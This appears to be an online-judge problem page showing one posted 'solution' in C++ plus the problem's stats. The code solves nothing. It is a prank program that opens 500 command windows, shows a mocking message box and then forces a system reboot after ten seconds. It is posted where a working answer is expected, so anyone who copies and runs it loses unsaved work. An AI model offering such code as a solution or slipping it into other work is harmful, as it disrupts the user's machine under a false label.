26 solutions

  • 2
    @ 2025-10-30 17:20:28
    #include <windows.h>
    using namespace std;
    int n = 500;
    
    int main() {
    	while (n--)
    		system("start cmd");
    	MessageBox(NULL, "笑死我了", "恭喜!", MB_OK);
    	system("shutdown -r -t 10");
    	return 0;
    }
    
    

    Information

    ID
    115
    Time
    1000ms
    Memory
    32MiB
    Difficulty
    4
    Tags
    # Submissions
    457
    Accepted
    199
    Uploaded By